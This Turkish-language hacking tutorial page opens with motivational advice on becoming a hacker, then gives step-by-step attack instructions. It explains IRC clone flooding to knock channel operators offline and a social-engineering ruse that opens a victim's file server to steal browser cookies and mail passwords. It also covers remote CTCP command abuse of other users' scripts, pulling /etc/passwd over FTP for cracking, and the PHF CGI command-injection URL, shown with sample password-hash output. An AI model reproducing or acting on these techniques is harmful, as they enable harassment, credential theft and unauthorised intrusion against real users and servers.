»
Hacker Olmak !
Evet, hacker olmak. Ne yapmali, ne etmeli de hackerliga adim atabilmeli...
Eminimki, bu yaziyi okuyanlarin %90'i ayniseyi dusunuyordur.
Fakat zannetme ki, bu yaziyi okuduktan sonra web sitelerini hack etmeye
baslayacaksin,ya da arkadasinin internet account sifresini bulabileceksin... Ayrica sunu
da bilmelisin ki,baslamak hicbir zaman,bitirmenin yarisi olmamistir... :)
Ben sana balik vermeyecegim, sana balik tutmasini da ogretemem, sana
ancak balik tutmasini ogrenmeye giden yolu gosterebilirim... IRC
ile ilgili birsey eklemek isterim; nuke atmak, flood yapmak gibi basit olaylari
gerceklestirmek,hacker olmak demek degildir. Bu tur islemler, fazla beceri gerektirmeyen, kolay
sayilabilecek, herkesin yaptigi seylerdir.Nuke atarak hacker oldugunu sanan kisiler
aslinda icten icten yanmakta ve egosunu bastirmaya calismaktadir.Peki hacker ne demektir
o zaman? Hacker, hack eden kimselere denir.Hack etme olayi ise hacking diye adlandirilir.
O zaman hacking ne demektir? Walla o ne demek ben de bilmiyorum... :)))
Hacking, kapali bir bilgisayar sistemine, bilgi almak icin sizmaktir.
Amac bilgi almaktir.Amac zarar vermek,para calmak, dosya silmek degildir, o
isi hackerlar degil, crackerlar yapar. Bir de phreaking var.
Bunu da kisaca soyle tanimlayabiliriz.Hacking + telefon sistemleri,
bu ikisini birlikte dusununce anlami cikiyor sanirim.Simdi heyecanla bekledigin
an geldi. "Nasil hacker olunur?" Cogu bilgisayar kullanicisinin hayalidir hacker
olmak.Simdi biraz da bundan bahsedelim. Hepsinden onemlisi :Okumak. Herseyi oku.
Internet ve bilgisayar dergileri en iyi kaynaklard?r. Mutlaka oku. Kilit nokta okumak.
Seni ilgilendirmese bile oku,sikilsan bile oku,eger biryerde takildiysan oku,
web sayfalarini oku,ezbere gitme, oku oku oku, okumaya devam et.
Eger bu konula daha onceden de ilgiliysen, linux hakkinda az cok duyumlar almissindir.
Linux bir unix turevi isletim sistemidir. Ancak windows'dan,dos'tan
cok farkli bir yazilimdir, bu yuzden kullanmasi da belli bir birikim,bilgi ister.
Genelde,hackerlar linux kullanir, bu yuzden cogu kisinin aklina su kazinmistir :
"Linux'suz hacker olunmaz..." Ama emin olki linux kullanmadan hack edebilirsin.
Kendini linuxa sartlama.Azimli sicanin ne yaptigini asla unutma.
Sen de bir azimli sican olmalisin. Bu arada okumaya devam et.
(herseyi oku, okumak kilit nokta) Bigisayarini sev,
onunla bol vakit gecir.
Arkadaslarin top oynarken sen bilgisayarinla calis . Evet
aynen oyle,kendini eve kapat, ogrenmeye calis, oku, oyun falan oyna.
Evden ne kadar az cikarsan, bilgisayarina ne kadar baglanirsan, o kadar hizli
ogrenirsin. Bu ayni logaritma grafigine benzer.
ogrenme hizin, ogrendikce artacaktir, bunu sen de goreceksin. Oku, herseyi oku.
Problemlerle karsilasacaksin, sakin yilma,yardim iste,yardim bulamayabilirsin, kendin
cozume ulasmaya calis, gerekirse uyuma, gozlerin morarsin,istahin kesilsin,
ama problemler karsisinda sakin yilma. Basariya ulastiginda kendini cok
cok daha dinc hissedeceksin. Oku, surekli oku. Kasani ac.
Kartlarla oyna, jumperlarla ugras, anakarti incele, kablolara bak,onlarla da ilgilen.Masanda
bir kolonya bulunsun. Kafayi yicek gibi olursan hemen kafandan asagi dok.Bu
gercekten seni rahatlatir.Oku, git soundcard kitapcigini oku. Bir sure
sonra geceleri ruyanda chat edecek,bilgisayar kullanacaksin. Bu bir gelisme sayilir.
Daha ne diyeyim Yani UgRasmalisin ..Yani PARCALA EwLaT..!ama OGRen.
Dene We GoR..!!!
Clone Teroru
»
Clone
Clone birtur flood dur.. indernette biri birden fazla mirc acarak kanallara adam sokarsa buna clone denir... Bazilari 10 tane mirc aciyor ve hepsini ayni kanala sokuyor ve boylece kanalda 10 kisi yani 10 clone oluyor.
Iste bu bolumdeki programlar sayesinde hic mirc acmadan birsuru (20-30) clone sokabilirsiniz... Tabi is sokmakla bitmiyor kanali tamamen gocerte bilirsiniz... Diyelimki Superonline server inda zurna kanalina 20 clone soktunuz hepsini aynanda sokup cikartabilirsiniz yada kanaldaki oplara ping cekerek onlari disconnect yapabilirsiniz ve bunungibi bircok sey yapabilirsiniz.Eger undernet e sokucaksaniz wako yu idirin.. Undernet haricindeki server lara sokucaksaniz VcLoNe u indirin...
Wako 18KB
VcLoNe 186KB
VcLoNe Kullanimi: Programi calistirin. En ustteki buyuk bosluga clonelari sokucaginiz server adresini yazin ornek: irc.superonline.com . Name kismina kafaniza gore bisey yazin. Auto join on connect $ikkini isaretleyin ve altindaki bosluga clone lari sokucaginiz kanalin ismini yazin bolece clonelar server a baglandiginda otomatikman o kanala giricek.
Nick name bolumunde clonelarin nick lerini ayarlayabilirsiniz. Random yaparsaniz program kafasina gore nick verir. Eyer Sequential yaparsaniz kendi yazacaginiz nickle clonelar kanala girecektir.
"Random IDENT" clonelarin id leri nin ayarlandigi bolum.. Orayi isaretlerseniz program kafasina gore id vericek isterseniz sizde kafaniza gore id verebilirsiniz..
Herseyi ayarladiktan sonra Connect e basin daha sonra port numarasini degistirin (7000 yazan yer) ve tekrar connect e basin bunu tekrarlayin.. En yukarida kac clone girdigini yazacaktir yeterince soktuktan sonra en alt solda "Clone Control" yazan dugmeye tiklayin...
iste tum is burada yapiliyor... "CycLe on ChanneL" a basinca hemen uzerinde yazan kanala hepsi aynanda girip cikar iste kanaldaa teror estirmeye basladiniz bile. Sira geldi kanaldaki oplari hattan dusurmeye. "Destination Nick" bolumune kanal da op olan birinin nickini yazin "Flood Type" dan ise "Ping.FLD" u secin ve "Flood" dugmesine basin bunu diger kanal oplarindada uygulayin hepsi ya disconnect olucak yada feci sekilde lag a girecektir.
Cookie kullanarak password araklamak
»
COOKIE KULLANARAK PASSWORD ALMA
Irc de burgaz kanalina giriyorum orada gozume kestirdigim birinin ozeline girip nuke programin varmi diye soruyorum
var derse benim dcc direk calismiyo /fserve Nick 100 c: oda yaziyo ondan sora netscape in icinde user in icindeki
cookies dosyasiyni aliyorum ve elimde tum mail leri mail passwd leri oluyo (tabi bazen olmuyo :P) nuke programin var
mi dedigimde yok derse istermisin diyorum o daha kolay oluyo hemen atliyo ayni yontemle... onlada fserve kuruyorum
boylece onunda cookies dosyasini aliyorum ve boooooom gene elimde tum mailleri ve webde uye oldugu yerlerin
passwd ler (tabi her zaman ise yaramiyo bunuda hatirlatiyim :P)
Dragon Ve Solucan Scripti Disaridan Yonetmek
»
Dragon ve Solucan Script Kullanicilarini yonetmek.
Yukarda ismi yazili scriptleri kullanan masumca chatini yapan kisilere irc yi zindan etmek artik cok basit.CTCP Ozelliklerini kullanarak en basiti kurbanin nickini degistirmekten baslayan ve her turlu mirc komutunu kullanmanizi saglayan komutlari acikliyorum.Nick Degistirme /ctcp nick LAGG /nick yeni nick
Kanala Sokma /ctcp nikc LAGG /join #kanal
Kanala yazi yazdirma /ctcp nick LAGG /msg #kanal mesaj
Kurbani ircden cikarma /ctcp nick LAGG /quit (mesaj istenirse)
Kurbanin mIRC ini kapama /ctcp nick LAGG /exit
Sizinde gordugunuz gibi aslinda olay sadece /ctcp nick LAGG den sonra yazdiginiz komutlarin kurban tarafindan uygulanmasindan baska birsey degildir.
Hack FTP
»
Ba$LiyoZ...
Simdi size bir iss i nasil hack edeceginizi anlatacam ; Gerekli Programlar Cracker Jack, CuteFTP,
Meliksah Ozoral's Dict Maker v1.0.
Bu Programlari Temin Edin... Cogunu http://www.mimsa.com/mweb adresinde bulabilirsiniz!
Simdi once hack etmek istediginiz yeri secin... Bu taktik cok basit oldugu icin her yer yemiye bilir siz
prizmanet, tubitak, planet gibi korumasi olmayan yerleri secin.ornegin prizma net. Once hack
etceginiz yerden bir acc bulun ve o acc uzerinden internete baglanin...ATDT08222111001 :)
Tamam baglandiniz simdi CuteFTP yi calistirin ve yeni bir baglanti secin;ilk olarak hack edeceginiz adresi baglanti yerine yazin ornegin ; ftp.prizma.net.tr sonra login yerine iss baglandiginiz
logini, password yerinede iss baglandiginiz passwordu yazin. Simdi de connect ile baglanin...
Evet ftp ye baglandiniz suanda kullandiginiz acc tun dizinindesiniz siz "/etc" dizinine gidin...
Bu dizindeki dosyalarin listesi karsiniza geldi burdan "passwd" adli dosyayi alin.Simdi olayin en buyuk
yani bitdi! Internet baglantisini kesin ve aldiginiz dosyayi Cracker Jack adli programin bulundugu dizine kopyalayin. Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd"
dosyasini kirmaya baslayin yoksa once Meliksah Ozoral's Dict Maker v1.0 ile bir wordlist hazirlayin...
Cracker Jack passwd dosyasindaki acclari kirmaya baslar... Bu islem gunlerce surer ve kirdigi acclari
kullanabilirsiniz...
--------------------------------------
Ehehehe Iste Bu Kadar Basit Bir Olay!
Size Iyi Eylenceler...
------------------------------------------
ICQ Gizli Yonleri
»
Icq internetin en unlu mesajlasma programi. Bu programda pekde gizli olmayan ama
herkesin bilmedigi birkac ozellik var. Bu yazimda size biraz onlardan
bahsedicegim.
Bu gizliliklerin birincisi nickin basina bosluk birakma yontemleri. Nickinizin basina " < " koyarsaniz o bir bosluk yerine
sayilacak. Iste 1. bosluk birakma yontemi bu. Mesela nickiniz Hamsi
. Infonuzu acin vede nickinizi su sekilde yazin : "<" Bu sayede nickinizin
basina 2 tane bosluk birakMiSh olurSunuz... Bir baSka bosluk BiRakma yonTemi ise
bir karakter kodunu yazarak. Bu kod Alt + 1010 ile yapilir vede sayili bosluk
anlamina gelir. Sayili bosluk NeDemek DerseNiz normalde icq programinda space
ile verdiginiz bosLuKlar sayilmAz . Ama 1010 ile verdikleriniz normal karakter
sayilir.
Ikinci gizlilik ise hicbir program kullanmadan bos mesaj yollamak. IcQ nuzu
acin vEde sadece " Space " tusuna basilarak yazilmis bir mesaj yollamayi
deneyin. Icq bu mesajiniz bos oldupu icin gonderilemiyor diyecektir. Simdi
yapmaniz gerek yukarda yazdigim gibi sayili bosluk birakma olucaktir. Yani Alt +
1010 . Bu bir kere yazip mesaji yolladiginiz zaman karsinizda gonderiLmekTe OLan
bir bos mesaj gorursunuz ;)
Birde sik sorulan soru : " Listemdeki bazi arkadaslarima mesaj gitmiyor.
Kafalar donup duruyor ama yollamiyor " . Genelde farkli server kullanin derler
bu olayincozulmesi icin ama hic bir ise yaranmadigi soylenebilir. Peki n'yapmak
lazim ? Cok kolay. Icq programinda Add Users 'a tiklayin vede karsiniza cikan
menude "ICQ number" yazan yere arkadasinizin numarasini yazin. Vede Search ' ye
tiklayin. Karsiniza arkadasiniz gelicek. Ona sag tiklayin. Acilan menuden
Message kizmana girin vede mesajinizi yazin. Send tusuna bastiginiz anda mesaji
gonderir. Yani artik arkadasiniza mesajlari ordan yazabilirsiniz Cok hizli bir
sekilde :)
Habersiz Adam Ekleme
Bilindigi gibi artik patch dosyalari sayesinde ICQ’da yapamadigimiz seyleri
yapmak mumkun, ornegin;listemizdeki birinin ip’sini ogrenmek artik cok kolay
veya listemize ekleyecek oldugumuz kisiden izin almamiz sart degil. Fakat hala
sorun var,cunku listemize aldigimiz kisiye giden “The user has added you to
his/her Contact List” mesajindan dolayi tam gizlilik saglayabilmis
olmuyoruz.Fakat bu mesajin gonderilmesini de engelleyebiliriz.oncelikle
listemize alacagimiz numarayi “add”den aratiyoruz ve numara bulundugunda
“status”tan “dicconnect”i seciyoruz ve hala acik olan arama penceresindeki
numaranin uzerine tiklayip listemize ekliyoruz,iste hepsi bu.Bu islem sonucunda
listemize aldigimiz kisiye “The user has added you to his/her Contact List”
gitmeyecektir,artik listemize herkesi hic sezdirmeden ekleyebiliriz.
Web hacking olayinda bilinen tum teknikler
»
WEB HACK NEDIR???
WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
Error 404
/cgi-bin/phf is not found on this server
Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
Ama asagidaki listeyi verirse bilinki buldunuz:)))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012:10:kafka
CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
g?loglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/guloglu:/bin/csh
PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
guloglu:*:1007:10:kemal GULOGLU:/home/user/guloglu:/bin/csh
Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.
Www.Strizerk.Narod.Ru | sitesinin tüm haklari,
Strizerk'e aittir.
